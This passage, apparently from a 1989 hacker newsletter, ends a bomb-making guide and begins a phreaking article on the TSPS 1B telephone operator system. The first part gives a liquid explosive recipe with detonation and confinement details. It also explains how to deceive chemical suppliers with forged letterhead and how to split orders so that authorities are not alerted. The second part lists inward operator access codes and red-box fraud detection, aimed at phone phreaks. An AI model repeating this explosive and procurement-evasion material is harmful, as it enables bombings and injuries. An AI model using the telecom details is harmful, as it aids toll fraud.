supplier. It usually runs about $20 to $30 bucks a gallon. Simply mix the
|
|||
|
|
|||
|
two liquids: 96% nitromethane and 4% ammonia (by weight). This explosive
|
|||
|
|
|||
|
has the disadvantage of being somewhat insensitive. You need at least
|
|||
|
|
|||
|
a No. 8 blasting cap to detonate it. It only need be confined in any kind
|
|||
|
|
|||
|
of capped bottle and the blasting cap inserted in the neck. The blasting
|
|||
|
|
|||
|
cap should be dipped in wax before immersion in the liquid explosive.
|
|||
|
|
|||
|
Some Nitromethane manufactures add a indicator dye that turns purple when
|
|||
|
|
|||
|
the liquid becomes dangerously explosive. So, when you mix your ammonia
|
|||
|
|
|||
|
with the Nitromethane and the solution turns purple, you know that you
|
|||
|
|
|||
|
have done well!
|
|||
|
|
|||
|
________________________________________
|
|||
|
|
|||
|
|
|||
|
|
|||
|
OBTAINING CHEMICALS AND LAB WARE
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Getting your chemicals and lab ware can present a problem in some cases.
|
|||
|
|
|||
|
In order to order laboratory chemicals, one must be a company, or
|
|||
|
|
|||
|
try to prove that you are a company. Most suppliers don't like to sell
|
|||
|
|
|||
|
to individuals in fear of clandestine drug and explosive manufacture.
|
|||
|
|
|||
|
Those same companies also can be fooled easily with homemade letterhead
|
|||
|
|
|||
|
also. For those of you with laser printers, the sky is the limit. If
|
|||
|
|
|||
|
you don't have a laser printer, you should visit your local print shop.
|
|||
|
|
|||
|
First, simply call the chemical companies and request for a catalog.
|
|||
|
|
|||
|
You must get on the phone and say something on the order of:
|
|||
|
|
|||
|
"Hello...this is C.B.G. Water Treatment Corp., may I speak to sales
|
|||
|
|
|||
|
please? I would like to order your most recent catalog..."
|
|||
|
|
|||
|
When you get catalogs from different companies, compare their prices
|
|||
|
|
|||
|
and shipping charges. Make sure you don't order a set of chemicals
|
|||
|
|
|||
|
where it is obvious you are making something you don't want them to know
|
|||
|
|
|||
|
you are making. A suspicious order would be Nitric & Sulfuric acid and
|
|||
|
|
|||
|
glycerine. This would be obvious that you are going to produce nitro-
|
|||
|
|
|||
|
glycerine. Spread out your orders and orders between companies. Also
|
|||
|
|
|||
|
be careful of watched chemicals. The drug enforcement agency watches
|
|||
|
|
|||
|
certain orders for certain chemicals. They usually say something on the
|
|||
|
|
|||
|
order of under the listing of the chemical entry in the catalog "only
|
|||
|
|
|||
|
sold to established institutions." It just so happens that certain
|
|||
|
|
|||
|
explosive synthesis requires the chemicals as some illicit drug
|
|||
|
|
|||
|
production.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Go to your local library in the reference section. Get the THOMAS REGISTER
|
|||
|
|
|||
|
It is a set of books that list addresses of industrial suppliers. Look
|
|||
|
|
|||
|
under chemicals for addresses.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
I do know of one company called Emerald City Chemical in Washington.
|
|||
|
|
|||
|
They only require that you be at least 18 years of age. No letterhead
|
|||
|
|
|||
|
necessary.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
I suggest staying away from Fisher Scientific, Seargent Welch, Sigma &
|
|||
|
|
|||
|
Aldrich Chemical companies because they are either expensive, only sell
|
|||
|
|
|||
|
to schools, or watch for illegal or suspicious chemical orders. I noticed
|
|||
|
|
|||
|
that a lot of you phreaks out there live in New York; so stay away from
|
|||
|
|
|||
|
City Chemical Co. I was informed that they closely watch their customers
|
|||
|
|
|||
|
also.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Don't make some letterhead for Jo Blow's Sewing Machine Repair and order
|
|||
|
|
|||
|
complicated chemicals like 2,3,7,8-tetrachlorodibenzo-p-dioxin, bis-2-
|
|||
|
|
|||
|
ethylhexy-diadipate, 3,4-diaminofurazain, or pharmecitucal type chemicals
|
|||
|
|
|||
|
or any kind of chemical that looks like a foreign language. It looks
|
|||
|
|
|||
|
VERY suspicious and your address will be forwarded to your local FBI or
|
|||
|
|
|||
|
DEA office pronto. Nowadays you really got to watch what you order
|
|||
|
|
|||
|
thanks to our bleeding heart liberals worrying about kids blowing their
|
|||
|
|
|||
|
hands off trying to make firecrackers, or folks making controlled drugs in
|
|||
|
|
|||
|
their basements.
|
|||
|
|
|||
|
________________________________________
|
|||
|
|
|||
|
|
|||
|
|
|||
|
CONCLUSION
|
|||
|
|
|||
|
|
|||
|
|
|||
|
I hope this information is of some use to you. Just remember that it is
|
|||
|
|
|||
|
a federal offense to manufacture and transport explosives or explosive
|
|||
|
|
|||
|
devices without a B.A.T.F. licence.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Also keep in mind that if you do decide to make yourself some bombs,
|
|||
|
|
|||
|
just remember NOT TO TELL ANYONE! If you tell someone, that is just the
|
|||
|
|
|||
|
added risk of getting caught because your "buddie" was a stool pigeon.
|
|||
|
|
|||
|
BELIEVE ME - chances are if you tell someone, others will find out from
|
|||
|
|
|||
|
gossip and you will be the alias "mad bomber" of your town. If someone
|
|||
|
|
|||
|
happens to see any lab equipment or if your neighbors smell any strange
|
|||
|
|
|||
|
chemical smells around your home, they might even think you are making
|
|||
|
|
|||
|
drugs, so be careful. If you tell your friends of your activities, don't
|
|||
|
|
|||
|
be surprised if you see a gunmetal grey Dodge Diplomat with a dozen
|
|||
|
|
|||
|
antennas protruding from it sitting across the street with a guy in it
|
|||
|
|
|||
|
watching your house with a spotting scope...
|
|||
|
|
|||
|
|
|||
|
|
|||
|
DO NOT SELL explosives to ANYONE without a licence. If they get caught,
|
|||
|
|
|||
|
the feds will plea-bargan with them and find out where they got the
|
|||
|
|
|||
|
bombs and of course your buddie will tell them so he gets a reduced
|
|||
|
|
|||
|
sentence. They WILL get a search warrant with no problem and proceed
|
|||
|
|
|||
|
to ransack your premises. I know of a person that was in a similar
|
|||
|
|
|||
|
situation. He didn't have any explosives in his house, but they seized
|
|||
|
|
|||
|
his chemicals because of the complaint filed. Subsequently, the feds
|
|||
|
|
|||
|
kept up pretty good surveillance on him for quite a while.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Use this information with caution and don't blow yourself up!
|
|||
|
|
|||
|
|
|||
|
|
|||
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Feb. 20, 1989
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Brought to you by
|
|||
|
|
|||
|
Franz Liszt,
|
|||
|
|
|||
|
and The Manipulators...
|
|||
|
|
|||
|
|
|||
|
|
|||
|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
|
|||
|
|
|||
|
|
|||
|
NOTICE: THIS FILE MAY ALSO BE RELEASED IN A 'YET TO COME' NEWSLETTER.
|
|||
|
|
|||
|
*************************************************************************
|
|||
|
|
|||
|
* * P/HUN Issue #4, Volume 2: Phile 6 of 11 * *
|
|||
|
|
|||
|
* * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * *
|
|||
|
|
|||
|
* * * *
|
|||
|
|
|||
|
* * Traffic Service Position System(TSPS) No. 1B * *
|
|||
|
|
|||
|
* * * *
|
|||
|
|
|||
|
* * Call Processing and Explanation * *
|
|||
|
|
|||
|
* * Part One * *
|
|||
|
|
|||
|
* * * *
|
|||
|
|
|||
|
* ********************************************************************* *
|
|||
|
|
|||
|
* ********************************************************************* *
|
|||
|
|
|||
|
* * * *
|
|||
|
|
|||
|
* * - Coin Stations and ACTS * *
|
|||
|
|
|||
|
* * - Calling Card Service * *
|
|||
|
|
|||
|
* * and * *
|
|||
|
|
|||
|
* * - Billed Number Screening * *
|
|||
|
|
|||
|
* * - Busy Line Verification * *
|
|||
|
|
|||
|
* * * *
|
|||
|
|
|||
|
* ********************************************************************* *
|
|||
|
|
|||
|
* ********************************************************************* *
|
|||
|
|
|||
|
* * * *
|
|||
|
|
|||
|
* * Written By. . . Phelix the Hack * *
|
|||
|
|
|||
|
* * * *
|
|||
|
|
|||
|
* ********************************************************************* *
|
|||
|
|
|||
|
* ********************************************************************* *
|
|||
|
|
|||
|
* * * *
|
|||
|
|
|||
|
* * The author hereby grants permission to reproduce, redistribute * *
|
|||
|
|
|||
|
* * or include this file in your g-file section, electronic or print * *
|
|||
|
|
|||
|
* * newsletter, or any other form of transmission of your choice, * *
|
|||
|
|
|||
|
* * pending the fact that it is kept intact and in its entirety, * *
|
|||
|
|
|||
|
* * with no additions, alterations or deletions of any of the info * *
|
|||
|
|
|||
|
* * included below. * *
|
|||
|
|
|||
|
* * * *
|
|||
|
|
|||
|
* * Phelix the Hack Feb. 1989 * *
|
|||
|
|
|||
|
* * * *
|
|||
|
|
|||
|
* ********************************************************************* *
|
|||
|
|
|||
|
*************************************************************************
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
1.0 Introduction
|
|||
|
|
|||
|
================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The purpose of this file is discuss and describe the general system
|
|||
|
|
|||
|
architecture and processing of certain calls handled in a Traffic Service
|
|||
|
|
|||
|
Position System (TSPS) No. 1B office. From here after, any reference to the
|
|||
|
|
|||
|
anacronym - TSPS, will be used to describe the Traffic Service Position System
|
|||
|
|
|||
|
1B. Wheras TSPS processes a wide variety of call types (listed below), this
|
|||
|
|
|||
|
file will deal primarily with only a few types which I feel to be of special
|
|||
|
|
|||
|
interest and importance to the phreak/hack community. Future files on TSPS
|
|||
|
|
|||
|
will continue to expand upon the information presented here, and will discuss
|
|||
|
|
|||
|
additional call types and processing.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The types of calls, elected to be discussed in this file will fall primarily
|
|||
|
|
|||
|
within the three following categories:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
1) Coin Station Calls (Payphone) and ACTS call processing.
|
|||
|
|
|||
|
2) Calling Card Service and Billed Number Screening.
|
|||
|
|
|||
|
3) Busy Line Verification
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
2.0 Table of Contents
|
|||
|
|
|||
|
======================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Section Description
|
|||
|
|
|||
|
======= ===========
|
|||
|
|
|||
|
3 Anacronyms and Abbreviations used throughout this file.
|
|||
|
|
|||
|
4 General overview of call types.
|
|||
|
|
|||
|
5 General call processing for Coin and CC Services.
|
|||
|
|
|||
|
6 Coin Station.
|
|||
|
|
|||
|
7 Calling Card Service.
|
|||
|
|
|||
|
8 Busy Line Verification
|
|||
|
|
|||
|
9 Conclusion : Acknowledgements and References.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
3.0 Anacronyms and Abbreviations
|
|||
|
|
|||
|
=================================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The following is a list of anacronyms and abbreviations commonly used
|
|||
|
|
|||
|
throughout this file. Due to the large number of times each appears, from
|
|||
|
|
|||
|
this point on the abbreviations will be used the majority of the time.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- TSPS - Traffic Service Position System
|
|||
|
|
|||
|
- ANI - Automatic Number Identification
|
|||
|
|
|||
|
- ANIF - ANI Failure
|
|||
|
|
|||
|
- ONI - Operator Number Identification
|
|||
|
|
|||
|
- H/M - Hotel/Motel
|
|||
|
|
|||
|
- DLS - Dial Line Service
|
|||
|
|
|||
|
- ACTS - Automated Coin Toll Service
|
|||
|
|
|||
|
- CCS - Calling Card Service
|
|||
|
|
|||
|
- BNS - Billed Number Screening
|
|||
|
|
|||
|
- OST - Originating Station Treatment
|
|||
|
|
|||
|
- SOST - Special Operator Service Treatment
|
|||
|
|
|||
|
- OPCR - Operator Actions Program
|
|||
|
|
|||
|
- RQS - Rate Quote System
|
|||
|
|
|||
|
- PTS - Position and Trunk Scanner
|
|||
|
|
|||
|
- RTA - Remote Trunk Arrangement
|
|||
|
|
|||
|
- DDD - Direct Distance Dialed
|
|||
|
|
|||
|
- AMA - Automatic Message Accounting
|
|||
|
|
|||
|
- CAMA - Centralized Message Accounting
|
|||
|
|
|||
|
- RBOC - Regional Bell Operating Company
|
|||
|
|
|||
|
- MF - Multi-Frequency
|
|||
|
|
|||
|
- DTMF - Dual Tone Multi-Frequency
|
|||
|
|
|||
|
- CDA - Coin Detection and Announcement
|
|||
|
|
|||
|
- SSAS - Station Signaling and Announcement Subsystem
|
|||
|
|
|||
|
- SPC - Stored Program Control
|
|||
|
|
|||
|
- T&C - Time and Charge
|
|||
|
|
|||
|
- PIN - Personal Identification Number
|
|||
|
|
|||
|
- RAO - Revenue Accounting Office
|
|||
|
|
|||
|
- NPA - Numbering Plan Area
|
|||
|
|
|||
|
- CCIS - Common Channel Interoffice Signaling
|
|||
|
|
|||
|
- APF - All PINs Fail
|
|||
|
|
|||
|
- OTC - Operating Telephone Company
|
|||
|
|
|||
|
- ICVT - InComing Verification Trunk
|
|||
|
|
|||
|
- OGVT - OutGoing Verification Trunk
|
|||
|
|
|||
|
- INTT - Incoming No Test Trunks
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
4.0 General Overview of Call Types
|
|||
|
|
|||
|
==================================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
All call processing can be broadly thought of as the processing of a service
|
|||
|
|
|||
|
request (by an operator or a customer) thru connection, talking state, and
|
|||
|
|
|||
|
disconnection. Call types can be classified into the following two major
|
|||
|
|
|||
|
groups: (Although no definite line can be drawn, in that the groups often
|
|||
|
|
|||
|
overlap each other.)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
4.1 Customer Originated Calls
|
|||
|
|
|||
|
==============================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The first category of calls are those which can be classified as customer
|
|||
|
|
|||
|
originated. In an effort to keep with the three main types discussed here,
|
|||
|
|
|||
|
some of the call types listed will not be explained.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
4.1.1) 1+ Calls
|
|||
|
|
|||
|
===============
|
|||
|
|
|||
|
- DDD calls
|
|||
|
|
|||
|
- Calls with ANIF or ONI
|
|||
|
|
|||
|
- H/M calls
|
|||
|
|
|||
|
- CAMA calls
|
|||
|
|
|||
|
- 900 Dial Line Service (DLS)..."Dial a Vote"
|
|||
|
|
|||
|
- NonCoin transfers from offices with out billing equipment
|
|||
|
|
|||
|
- Coin Calls...Discussed later in greater detail
|
|||
|
|
|||
|
|
|||
|
|
|||
|
4.1.2) 0+ Calls
|
|||
|
|
|||
|
================
|
|||
|
|
|||
|
- Calling Card Service (CCS) Calls
|
|||
|
|
|||
|
- Billed Number Screening (BNS) Calls
|
|||
|
|
|||
|
- Originating Station Treatment (OST)..Third Party Billing, Collect..
|
|||
|
|
|||
|
|
|||
|
|
|||
|
4.1.3) 0- Calls
|
|||
|
|
|||
|
================
|
|||
|
|
|||
|
- OPCR ...Standard RBOC(or Equivalent) "0" operator
|
|||
|
|
|||
|
|
|||
|
|
|||
|
4.1.4) International Call Handling (ICH) ...Overseas Calls
|
|||
|
|
|||
|
===========================================================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
4.1.5) Automated Quotation Service and H/M calls
|
|||
|
|
|||
|
=================================================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
4.2 Operator Originated
|
|||
|
|
|||
|
========================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The second category of calls handled by TSPS are operator originated, and are
|
|||
|
|
|||
|
normally only initiated after a response to a customers request. These calls
|
|||
|
|
|||
|
are of a nature that require operator intervention in order to complete.
|
|||
|
|
|||
|
Examples: BLV/EMG INT, collect, third party billing...
|
|||
|
|
|||
|
|
|||
|
|
|||
|
4.2.1) Special Operator Service Traffic (SOST)
|
|||
|
|
|||
|
===============================================
|
|||
|
|
|||
|
- These include calls which must be transferred to a SOST switchboard
|
|||
|
|
|||
|
before they can be processed. Examples: Conferences, Appointment,
|
|||
|
|
|||
|
Mobile...
|
|||
|
|
|||
|
|
|||
|
|
|||
|
4.2.2) Delayed Calls
|
|||
|
|
|||
|
=====================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
4.2.3) Operator Service Calls
|
|||
|
|
|||
|
==============================
|
|||
|
|
|||
|
- Customer/ Operator requested Rate and Route information ( RQS )
|
|||
|
|
|||
|
|
|||
|
|
|||
|
4.2.4) CAMA Transfer Calls
|
|||
|
|
|||
|
===========================
|
|||
|
|
|||
|
- Includes ANIF and ONI
|
|||
|
|
|||
|
- Transfers from areas without billing equipment
|
|||
|
|
|||
|
|
|||
|
|
|||
|
4.2.5) Busy Line Verification (BLV)
|
|||
|
|
|||
|
====================================
|
|||
|
|
|||
|
- The Busy Line Verification allows a TSPS operator to process a
|
|||
|
|
|||
|
customers request for a confirmation of a repeatedly busy line.
|
|||
|
|
|||
|
This service is used in conjunction with Emergency Interrupts and
|
|||
|
|
|||
|
will be discussed later in more detail.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
4.2.6) Inward Calls
|
|||
|
|
|||
|
====================
|
|||
|
|
|||
|
- An inward call requires a TSPS operator to provide services which
|
|||
|
|
|||
|
the customers originating operator is not able to provide. Ex:
|
|||
|
|
|||
|
connection to a hard to reach number, BLV/EMG INT, CCS billing
|
|||
|
|
|||
|
validation...An inward call can be originated with any of the
|
|||
|
|
|||
|
following arrival codes:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- 121 : NonCoin code...standard inward connection
|
|||
|
|
|||
|
- 1150 : Coin code
|
|||
|
|
|||
|
- 1155 : Noncoin with T&C code
|
|||
|
|
|||
|
- 1160 : TSPS operator assisted inward CCS validation
|
|||
|
|
|||
|
- 1161 : Automated inward CCS validation for non TSPS operator
|
|||
|
|
|||
|
with DTMF touch tone signaling.
|
|||
|
|
|||
|
- 1162 : Automated inward CCS validation for non TSPS operator
|
|||
|
|
|||
|
with MF signaling.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- Examples of the above codes:
|
|||
|
|
|||
|
- KP+NPA+121+ST gets inward operator in NPA selected with only
|
|||
|
|
|||
|
INWD key illuminated, indicating call connected to position
|
|||
|
|
|||
|
in an inward call.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- KP+1161+ST gets automated CCS validation that responds to
|
|||
|
|
|||
|
DTMF tones.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
5.0 General Call Processing for Coin Stations and CCS
|
|||
|
|
|||
|
======================================================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
This section will deal with the processing that occurs during all customer
|
|||
|
|
|||
|
initiated calls, and can be applied to both Coin and CCS calls. The following
|
|||
|
|
|||
|
processes are presented in the order which they would normally be handled.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
5.1) Trunk Seizure
|
|||
|
|
|||
|
===================
|
|||
|
|
|||
|
- When a local office seizes a trunk in response to a customer request
|
|||
|
|
|||
|
(i.e.- A customer has picked up the phone, placing it off-hook),
|
|||
|
|
|||
|
current flows thru the circuit, changing the state of the ferrods
|
|||
|
|
|||
|
(i.e.- scan points ) from an on-hook to an off-hook position. When
|
|||
|
|
|||
|
this change is determined by the PTS (Position and Trunk Scanner) at
|
|||
|
|
|||
|
the RTA (Remote Trunk Arrangement) to be an actual off-hook
|
|||
|
|
|||
|
transition, and not merely a flash (tapped switch hook), it is taken
|
|||
|
|
|||
|
as a request for service.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
5.2) Digit Reception
|
|||
|
|
|||
|
=====================
|
|||
|
|
|||
|
- After a trunk is seized the local office sends the called and
|
|||
|
|
|||
|
calling number to the TSPS by means of MF pulsing. A Base Remote
|
|||
|
|
|||
|
Trunk is connect to the MF receiver, which then proceeds to outpulse
|
|||
|
|
|||
|
the MF digits. The digits are received and registered on ferrods by
|
|||
|
|
|||
|
the PTA in the order in which they were received. The called number
|
|||
|
|
|||
|
is the number dialed by the customer and consists of either 7 or 10
|
|||
|
|
|||
|
digits; the calling number is determined by the local office ANI
|
|||
|
|
|||
|
equipment or by ONI, in case of ANIF.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
5.3) Bridging a Position
|
|||
|
|
|||
|
=========================
|
|||
|
|
|||
|
- An idle occupied position is then bridged onto the call by a
|
|||
|
|
|||
|
connection to the TSPS. If operator service is required after
|
|||
|
|
|||
|
connection to a position, the operator is prompted by a "zip" tone,
|
|||
|
|
|||
|
and is alerted by a KIND OF CALL lamp, which provides information
|
|||
|
|
|||
|
as to whether the call is coin, noncoin, 0+, 0-...If no operator
|
|||
|
|
|||
|
service is required, the MF digits are outpulsed along the
|
|||
|
|
|||
|
appropriate routing.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
5.4) Call Connection
|
|||
|
|
|||
|
=====================
|
|||
|
|
|||
|
- If operator action was needed, upon the operators disconnect of the
|
|||
|
|
|||
|
line (position released), the network connection between the the
|
|||
|
|
|||
|
TSPS trunk and the base remote trunk is severed. The established
|
|||
|
|
|||
|
through connection is now placed in a call floating (talking) state
|
|||
|
|
|||
|
until disconnect.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
5.5) Call Disconnection
|
|||
|
|
|||
|
========================
|
|||
|
|
|||
|
- Both ends of a connected call are monitored for an off-hook state
|
|||
|
|
|||
|
change, which upon indication,must occur long enough to be recognized
|
|||
|
|
|||
|
as an actual disconnect (and not merely a flash...). Another manner
|
|||
|
|
|||
|
of disconnect is from a called party Time Released Disconnect (TRD),
|
|||
|
|
|||
|
which is employed to limit billed party liability and release network
|
|||
|
|
|||
|
connections. Example: A customer requests a disconnect after x number
|
|||
|
|
|||
|
of minutes, or after $x.xx. The final action in a disconnect is to
|
|||
|
|
|||
|
return the TSPS trunk to an idle position, which then awaits
|
|||
|
|
|||
|
recognition of another service request.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
5.6) AMA Data Accumulation and Reception
|
|||
|
|
|||
|
=========================================
|
|||
|
|
|||
|
- After a disconnect has been established, the AMA information is
|
|||
|
|
|||
|
registered, and prepared for billing. The following is just some
|
|||
|
|
|||
|
of the information that is recorded on disk for processing.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- Call Connect
|
|||
|
|
|||
|
- Elapsed time
|
|||
|
|
|||
|
- Signaling Irregularities
|
|||
|
|
|||
|
- WalkAway Toggle (coin station fraud...discussed later)
|
|||
|
|
|||
|
- Type of number billed
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
6.0 Coin Station Calls and ACTS Processing
|
|||
|
|
|||
|
==========================================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
In general, coin station calls can be divided into 1+, 0+ and 0- originated
|
|||
|
|
|||
|
calls, not including 0+ and 0- CCS calls which will be discussed later in this
|
|||
|
|
|||
|
file. All calls falling into these categories go through the following basic
|
|||
|
|
|||
|
operations, many of which were described in section 5 of this file. (The []
|
|||
|
|
|||
|
indicate operations that may or may not be present, depending on the type of
|
|||
|
|
|||
|
call placed)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
- 1) Trunk Seizure
|
|||
|
|
|||
|
- 2) Digit Reception
|
|||
|
|
|||
|
- 3) Bridging a Position [and Coin Detection and Announcement (CDA)]
|
|||
|
|
|||
|
- 4) [Operation Action and] Digit Outpulsing.
|
|||
|
|
|||
|
- 5) Talking Connection
|
|||
|
|
|||
|
- 6) Call Disconnect
|
|||
|
|
|||
|
- 7) AMA Processing
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
6.1 Automated Call Processing
|
|||
|
|
|||
|
==============================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
All coin station calls requiring coin input from the customer are handled by
|
|||
|
|
|||
|
the Automated Toll Services (ACTS) which is implemented by the Station
|
|||
|
|
|||
|
Signaling and Announcement Subsystem (SSAS). The SSAS automates the initial
|
|||
|
|
|||
|
contact on most 1+ (station paid) toll calls, by transmitting an announcement
|
|||
|
|
|||
|
requesting the initial deposit from the customer, and counting the deposits.
|
|||
|
|
|||
|
If an unusual delay occurs during the coin deposit period, the SSAS will prompt
|
|||
|
|
|||
|
the user for the remaining deposit needed to complete the call. Upon
|
|||
|
|
|||
|
completion of sufficient deposit, SSAS provides an acknowledgement announcement
|
|||
|
|
|||
|
thanking the customer, and then causes the outpulsing of the called digits to
|
|||
|
|
|||
|
be handled by the Stored Program Control (SPC). This delay in outpulsing
|
|||
|
|
|||
|
prevents free, short duration messages and keeps the audible ring of the called
|
|||
|
|
|||
|
party from interfering with coin detection signals. Any customer over-deposit
|
|||
|
|
|||
|
is automatically credited towards overtime charges. SSAS can accommodate
|
|||
|
|
|||
|
initial periods of up to 6 minutes, at the end of which the local office rate
|
|||
|
|
|||
|
schedule is accessed and announcement may or may not notify the customer of
|
|||
|
|
|||
|
the end of initial period.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
6.2 Operator Intervention
|
|||
|
|
|||
|
===========================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
If at any time during the coin collection period, a customer fails to deposit
|
|||
|
|
|||
|
the sufficient funds (within a specified time period), or a flash is registered
|
|||
|
|
|||
|
on the switchhook, a TSPS operator will be bridged onto the call. In this
|
|||
|
|
|||
|
event SSAS will monitor the coin deposits via a type I CDA circuit; however all
|
|||
|
|
|||
|
automated coin announcements will be suppressed. All calls originating from
|
|||
|
|
|||
|
postpay coin stations must initially be handled by an operator, in that postpay
|
|||
|
|
|||
|
coin stations lack coin return equipment, and cannot return deposited coins
|
|||
|
|
|||
|
(i.e.- Postpay stations do not have a coin hopper, only a coin box). This
|
|||
|
|
|||
|
physical restriction requires the operator to verify that the correct party has
|
|||
|
|
|||
|
been reached (and goes off-hook), before the customer makes any deposit. Upon
|
|||
|
|
|||
|
verification, a type II CDA circuit is connected to count and monitor the coin
|
|||
|
|
|||
|
deposits. This type of circuit is also connected whenever there is a large
|
|||
|
|
|||
|
amount of change associated with the call. This is because the coin hoppers on
|
|||
|
|
|||
|
standard payphones, can only handle limited deposits. If a deposit exceeds the
|
|||
|
|
|||
|
hopper limit, an operator will be bridged to the circuit to make a series of
|
|||
|
|
|||
|
partial collections.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
6.3 SSAS Fully Automatic Criteria
|
|||
|
|
|||
|
==================================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The SSAS fully automates 1+ coin station calls (ACTS) if and only if all of the
|
|||
|
|
|||
|
following conditions are met. Failure to meet any of these conditions results
|
|||
|
|
|||
|
in operator intervention.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
6.3.1) ACTS Converted Trunk Group
|
|||
|
|
|||
|
==================================
|
|||
|
|
|||
|
- Coin Stations must be converted to provide DTMF coin deposit signals
|
|||
|
|
|||
|
that the CDA can recognize.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
6.3.2) Machine Ratable
|
|||
|
|
|||
|
=======================
|
|||
|
|
|||
|
- The TSPS must receive sufficient rating information; failure to do so
|
|||
|
|
|||
|
will result in operator intervention.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
6.3.3) Successful ANI
|
|||
|
|
|||
|
======================
|
|||
|
|
|||
|
- If ANIF or the call is ONI, an operator must be added to the circuit
|
|||
|
|
|||
|
to record the calling number.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
6.3.4 Cannot Be a Postpay Station
|
|||
|
|
|||
|
==================================
|
|||
|
|
|||
|
- See previous explanation of postpay stations (6.2).
|
|||
|
|
|||
|
|
|||
|
|
|||
|
6.3.5 Cannot Have Large Charges
|
|||
|
|
|||
|
================================
|
|||
|
|
|||
|
- See previous explanation (6.2).
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
6.4 Fraud Detection and Prevention
|
|||
|
|
|||
|
==================================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
If a calling customer goes on-hook (hangs up), at the end of a conversation and
|
|||
|
|
|||
|
charges are still due, TSPS automatically sends a ringback signal to that
|
|||
|
|
|||
|
station in the attempt to get the customer to pick up the phone. If the
|
|||
|
|
|||
|
calling party answers, an ACTS overtime charge message is made requesting the
|
|||
|
|
|||
|
customer to deposit the remaining amount due. At any time during this message,
|
|||
|
|
|||
|
an operator may be connected to the circuit and harass the customer for payment
|
|||
|
|
|||
|
If however 5 rings with a 4 second interval occur without an off-hook state
|
|||
|
|
|||
|
change, TSPS assumes a walkaway, and a registered traffic counter is flagged,
|
|||
|
|
|||
|
a walkaway bit set, and the amount due is all registered as AMA data.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Whenever the called party is off-hook, ACTS is susceptible to generated coin
|
|||
|
|
|||
|
signals (Red Box Tones). In an attempt to prevent this fraud, a special type
|
|||
|
|
|||
|
II CDA is employed: Two-wire trunks are isolated between forward and back party
|
|||
|
|
|||
|
to monitor coin deposits. The talking path maintains conversation by being
|
|||
|
|
|||
|
routed through the type II CDA. When coin signals are detected, the SSAS
|
|||
|
|
|||
|
informs TSPS that a called party fraud is suspected. If more then one
|
|||
|
|
|||
|
detection occurs on one call, TSPS flags a fraud indicator on the calls AMA
|
|||
|
|
|||
|
record. NOTE:A trunk group may or may not detect and/or record this information
|
|||
|
|
|||
|
depending on office criteria.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
7.0 Calling Card Service and Billed Number Service
|
|||
|
|
|||
|
===================================================
|
|||
|
|
|||
|
|
|||
|
|
|||
|
I am assuming that everyone reading this file has at least some concept of what
|
|||
|
|
|||
|
